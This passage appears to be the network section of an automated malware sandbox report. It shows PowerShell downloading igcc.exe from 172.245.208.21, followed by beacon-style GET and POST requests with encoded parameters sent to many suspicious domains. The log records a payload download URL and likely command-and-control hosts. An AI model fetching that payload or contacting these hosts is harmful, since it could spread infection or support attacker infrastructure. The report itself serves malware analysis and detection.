                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00A97A18 URLDownloadToFileW,3_2_00A97A18
                  Source: global trafficHTTP traffic detected: GET /233/igcc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.208.21Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /1imc/?UV90oJV=GkZ+7lZN5ZbT6rZArZ+XuW2LS/GQFqiR2eAXidPe90Y9rybDHdv8GRqVb6FfMfkpXSVDgNv2zaXT/X0CpEMHyOeTTSnvzCMVpGnq9juhbcH3k1fZ/Ho823c=&LVsla=JHrxl4t HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.worrr37.yachtsUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                  Source: global trafficHTTP traffic detected: GET /ma0g/?LVsla=JHrxl4t&UV90oJV=H2S90RmziCMvLCuK8yTaL3f2umhuNHnT+UjWuF5QkK5TSoHa4lhKP7xjBIvwYHsxlglzK0GWG6GIcHietPpqxtVwo9BPmEy9xm5LwWe49kMrhYdXnmUTf+U= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.soportemx-findmy.clickUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                  Source: global trafficHTTP traffic detected: GET /lvz4/?LVsla=JHrxl4t&UV90oJV=Xs1PCb/MaYPIPAxC0xa5KYs0mBAqh55MCQOIGo7Nl8rFa4QZz+K5GgFtLYl71/JRpNHUa5jW6jDEqn+5iMTLUOrlc9oIlR4hoTx0RRj+HMWFGvWCftcbeJU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.vczuahand.xyzUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                  Source: global trafficHTTP traffic detected: GET /q86a/?UV90oJV=1RS/DLESjC/mKKX8H/biPEM9gARAP1aCo7MGFq+OZJ2Pg2HsdXdlDjVOv2U28y6Xqr87siUnw8FG4MQCr+RpE4Jbc2RQrC0NObuWRju52AhcIqb+addZL2w=&LVsla=JHrxl4t HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.855696a.xyzUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                  Source: global trafficHTTP traffic detected: GET /pl23/?UV90oJV=pwQm/8Nry++CWhwQL+edwmsiGWUfvm6b9cWiDzs/wKG7gU2SU1fIaah3O92QYMu9f5MkpzQiI887Voc7ljrK5SXzymeZM+96L5laMJ6YTiuiIGaOCWa6b3c=&LVsla=JHrxl4t HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.headset2.onlineUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                  Source: global trafficHTTP traffic detected: GET /q4wg/?UV90oJV=WxORhD4RgEO5uNW184qlq8Q0sLDKmVXJQFKGj9LBFcZ0l1e50YnvQ+dx8Uckd3rx1A/7IdNYVLsTEbVWPiDE6kUoQ6MsB12dGIVZYU7ysqzBCJWSaxY+T48=&LVsla=JHrxl4t HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.futureedge.websiteUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                  Source: global trafficHTTP traffic detected: GET /b8n0/?LVsla=JHrxl4t&UV90oJV=kyUzpDR/GXT4UV/+nqvvJVx8HRrNNeN1bnrOTHFLjUDm6VF6u4qvCiKuxhi22xyg+3lxI6NA/7DjeYVJhJi69sZr4sjCAoWURSuJ0WnZK+Wxfh1+frT+mkg= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.meshki-co-uk.shopUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                  Source: global trafficHTTP traffic detected: GET /6npl/?UV90oJV=/JYiv5NhO0tELAK8hKXRL6yPw09VuQMvi5BuLmngF2OWbpzZErtHeLuo5nDg79GzI2QTdod40q0r+J2P58yW7/6plb4OcALkiS6guO79bLlT8DxgdN065to=&LVsla=JHrxl4t HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.anyang-590303492.clickUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                  Source: global trafficHTTP traffic detected: GET /m5zm/?UV90oJV=PmzW3uKrzkvafX7YmWso/UgbPLCln62W7aZsDeQW57a8PFgVuI396d9PnNPN9UkA9AF+Unyq0/1iIG4gmLCCW+qdaIFQzw6LJwxTaHYvFotAr8O8Y9RkveE=&LVsla=JHrxl4t HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.reiki.voyageUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                  Source: global trafficHTTP traffic detected: GET /a2xu/?UV90oJV=jG6ux6r2iflBaU1tQVCr9K9Q4L27yHdJpXWErKL/4Ad9P/5nkj55oo2gDOwPZNYoN7pHD3In5mvXkhGBF69yz65s7gEqX6dtQwXXozW7lMq8H9Uo2bG9SNE=&LVsla=JHrxl4t HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.akfix-msk.storeUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                  Source: global trafficHTTP traffic detected: GET /ca0u/?UV90oJV=MvRre+3QwZ6yIy+2fyz7YvSSWTAdcKEGQPe5yQw4H7cZIU9bypTiCFjTFWtHevCXXt6GxLHI1FAEgZfYXX1jhre07MuBOcgxovAcCWT1F0UOuG5xezV3UzM=&LVsla=JHrxl4t HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.malayexpess.onlineUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                  Source: global trafficHTTP traffic detected: GET /pji1/?LVsla=JHrxl4t&UV90oJV=oPSxN0d9Y70P2riykwj378jDK4dA5CWov285JwcUKQzMmNdemng31QxGRPhWi1n81NmvKhZ2Lkv1YeaEtRyFRChPj4DjhNDfDC0AWPeNp3jL6YRDWHxMF/w= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.play-venom-rush.xyzUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                  Source: global trafficHTTP traffic detected: GET /qasf/?UV90oJV=yuIihCwMXqfTMsBlSG09EuTWxsYqILBvxKvjbtWwi1EQdqGXerweWu7wqlk+gPqu8qljoC2xXboDZUnh0VRArwDFUnRa3BfVv9e4xBxD9zej7fg5DR8Kde0=&LVsla=JHrxl4t HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.jicode.xyzUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                  Source: global trafficDNS traffic detected: DNS query: www.thykingdomwear.store
                  Source: global trafficDNS traffic detected: DNS query: www.worrr37.yachts
                  Source: global trafficDNS traffic detected: DNS query: www.soportemx-findmy.click
                  Source: global trafficDNS traffic detected: DNS query: www.blackhat.chat
                  Source: global trafficDNS traffic detected: DNS query: www.vczuahand.xyz
                  Source: global trafficDNS traffic detected: DNS query: www.855696a.xyz
                  Source: global trafficDNS traffic detected: DNS query: www.headset2.online
                  Source: global trafficDNS traffic detected: DNS query: www.futureedge.website
                  Source: global trafficDNS traffic detected: DNS query: www.meshki-co-uk.shop
                  Source: global trafficDNS traffic detected: DNS query: www.forjoyi.live
                  Source: global trafficDNS traffic detected: DNS query: www.anyang-590303492.click
                  Source: global trafficDNS traffic detected: DNS query: www.reiki.voyage
                  Source: global trafficDNS traffic detected: DNS query: www.akfix-msk.store
                  Source: global trafficDNS traffic detected: DNS query: www.malayexpess.online
                  Source: global trafficDNS traffic detected: DNS query: www.play-venom-rush.xyz
                  Source: global trafficDNS traffic detected: DNS query: www.jicode.xyz
                  Source: unknownHTTP traffic detected: POST /ma0g/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Content-Length: 204Cache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedHost: www.soportemx-findmy.clickOrigin: http://www.soportemx-findmy.clickReferer: http://www.soportemx-findmy.click/ma0g/User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516Data Raw: 55 56 39 30 6f 4a 56 3d 4b 30 36 64 33 6e 4c 70 6f 77 42 35 62 30 66 7a 2b 6c 54 47 4d 31 2b 53 35 45 67 56 65 30 37 6a 72 46 50 4b 6b 7a 5a 62 6f 34 35 78 44 62 2b 63 38 55 64 70 50 66 74 55 4f 62 32 75 66 33 6b 76 68 41 39 69 54 43 57 50 53 5a 37 73 4b 6c 32 7a 68 2b 64 50 6f 65 39 6b 31 4b 41 50 74 30 2b 74 36 41 74 76 34 57 66 4e 71 58 30 33 73 4e 45 6f 6e 58 51 77 46 4f 76 41 45 6c 47 75 7a 76 6a 50 64 71 5a 4b 58 36 57 6c 54 64 79 4f 41 45 4c 30 4f 61 51 6f 71 4d 74 32 2f 78 63 2b 33 54 42 34 48 49 41 56 39 34 6d 76 66 57 41 36 48 35 46 45 35 54 35 62 6c 67 5a 59 30 55 4f 35 4f 2f 61 56 74 51 3d 3d Data Ascii: UV90oJV=K06d3nLpowB5b0fz+lTGM1+S5EgVe07jrFPKkzZbo45xDb+c8UdpPftUOb2uf3kvhA9iTCWPSZ7sKl2zh+dPoe9k1KAPt0+t6Atv4WfNqX03sNEonXQwFOvAElGuzvjPdqZKX6WlTdyOAEL0OaQoqMt2/xc+3TB4HIAV94mvfWA6H5FE5T5blgZY0UO5O/aVtQ==
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Apr 2025 15:21:22 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67c25548-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Apr 2025 15:21:25 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67c25548-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Apr 2025 15:21:28 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67c25548-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Apr 2025 15:21:31 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67c25548-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Apr 2025 15:21:38 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Apr 2025 15:21:41 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Apr 2025 15:21:44 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 